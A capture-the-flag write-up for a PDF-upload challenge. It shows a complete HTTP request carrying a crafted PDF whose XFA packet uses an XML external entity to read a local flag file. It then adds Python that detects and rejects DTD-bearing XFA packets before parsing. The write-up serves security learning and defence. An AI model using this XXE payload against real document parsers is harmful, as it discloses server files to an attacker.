Related: CTF writeups, security learning

SecureDoc

The challenge is a file upload. I fuzzed the allowed file types first and it looked like only PDF was accepted, so this was not going to be a traditional file-upload RCE. Uploading an arbitrary PDF showed the hint: No XFA content found in PDF. This parser specializes in XFA forms. So I looked up the XFA parsing vulnerability: https://www.cnblogs.com/clnchanpin/p/19474345 . It is not clear what parser is used here, but these are all parsing vulnerabilities and the PoC should be roughly the same, so it can be reused here. The PoC from the link given in the article seemed to have a small problem; swapping in the XML from the article body itself worked. PoC:

POST /upload HTTP/1.1
Host: 5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn
Content-Length: 1636
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWGd0SmXmAipiUh8U
Accept: */*
Origin: http://5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn
Referer: http://5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _clck=110bj5k%5E2%5Eg30%5E0%5E2101
Connection: keep-alive
 
------WebKitFormBoundaryWGd0SmXmAipiUh8U
Content-Disposition: form-data; name="file"; filename="CVE-2025-66516-xfa-passwd.pdf"
Content-Type: application/pdf
 
%PDF-1.7
%âãÏÓ
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>
endobj
5 0 obj
<< /Length 486 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "file:///flag">
    ]>
      <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
        <config xmlns="http://www.xfa.org/schema/xci/3.1/">
      <present><pdf><version>1.7</version></pdf></present>
      </config>
        <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
          <subform name="form1" layout="tb">
          <pageSet>
          <pageArea><contentArea/><medium stock="letter"/></pageArea>
        </pageSet>
        <subform>
            <field name="data">
          <ui><textEdit/></ui>
        <value><text>&xxe;</text></value>
        </field>
      </subform>
    </subform>
  </template>
    <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
  </xfa:datasets>
</xdp:xdp>
 
endstream
endobj
4 0 obj
<< /NeedAppearances true /Fields [] /XFA 5 0 R >>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000080 00000 n 
0000000137 00000 n 
0000000225 00000 n 
0000000762 00000 n 
trailer
<< /Size 6 /Root 1 0 R >>
startxref
827
%%EOF
 
------WebKitFormBoundaryWGd0SmXmAipiUh8U--
 

Then visit /preview/f4902791-aaee-4b83-875e-2a4f8d0195f0
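The weakness the challenge exploits is an XFA/XDP packet whose DTD declares an external entity, which the server-side XML parser then resolves. The following is an added defensive example, not code from the challenge, the linked article, or any real PDF library: it pulls XDP packets out of PDF stream objects with a regex, refuses any packet that carries a DOCTYPE or ENTITY declaration before it reaches a parser, and only then reads the form field values with the standard library. The two XFA samples and the minimal PDF skeleton around them are constructed for this example; the challenge's real upload handler and error strings are assumed, not known.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the XDP packet shape from the PoC above, with the
# external-entity declaration that makes it an XXE payload.
MALICIOUS_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
    <subform name="form1">
      <field name="data"><value><text>&xxe;</text></value></field>
    </subform>
  </template>
</xdp:xdp>
"""

# Constructed sample: the same form with no DTD and a literal field value.
BENIGN_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
    <subform name="form1">
      <field name="data"><value><text>hello</text></value></field>
    </subform>
  </template>
</xdp:xdp>
"""

TEMPLATE_NS = "{http://www.xfa.org/schema/xfa-template/3.3/}"
XFA_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXfa(ValueError):
    """Raised when an XFA packet declares a DTD or entities."""


def wrap_in_pdf(xfa: bytes) -> bytes:
    """Constructed minimal PDF skeleton carrying one XFA stream (enough for the regex, not a full PDF)."""
    return (b"%PDF-1.7\n5 0 obj\n<< /Length " + str(len(xfa)).encode()
            + b" >>\nstream\n" + xfa + b"\nendstream\nendobj\n%%EOF\n")


def extract_xfa_streams(pdf: bytes) -> list:
    """Return every stream body that looks like an XDP/XFA packet."""
    return [s for s in XFA_STREAM_RE.findall(pdf) if b"<xdp:xdp" in s]


def has_dtd(xml: bytes) -> bool:
    """True if the packet carries a DOCTYPE or ENTITY declaration (the XXE precondition)."""
    return DTD_RE.search(xml) is not None


def safe_parse_xfa(xml: bytes) -> dict:
    """Reject DTD-bearing packets, then read field names and literal text values."""
    if has_dtd(xml):
        raise UnsafeXfa("DTD or entity declaration in XFA packet rejected")
    root = ET.fromstring(xml)  # expat here never fetches external entities, and no DTD reaches it
    fields = {}
    for field in root.iter(TEMPLATE_NS + "field"):
        text = field.find(TEMPLATE_NS + "value/" + TEMPLATE_NS + "text")
        fields[field.get("name")] = text.text if text is not None else ""
    return fields


def check_upload(pdf: bytes) -> dict:
    """Server-side handling of an uploaded PDF: all XFA packets are validated before parsing."""
    streams = extract_xfa_streams(pdf)
    if not streams:
        raise ValueError("No XFA content found in PDF")
    fields = {}
    for stream in streams:
        fields.update(safe_parse_xfa(stream))
    return fields


def upload_is_rejected(pdf: bytes) -> bool:
    """True if the upload is refused because of an unsafe XFA packet."""
    try:
        check_upload(pdf)
    except UnsafeXfa:
        return True
    return False


if __name__ == "__main__":
    print(check_upload(wrap_in_pdf(BENIGN_XFA)))
    print("malicious upload rejected:", upload_is_rejected(wrap_in_pdf(MALICIOUS_XFA)))
```

The check happens on the raw bytes before any XML parser sees the packet, so it does not depend on which parser or library the application uses; an XFA form never needs a DTD, so rejecting one outright loses nothing.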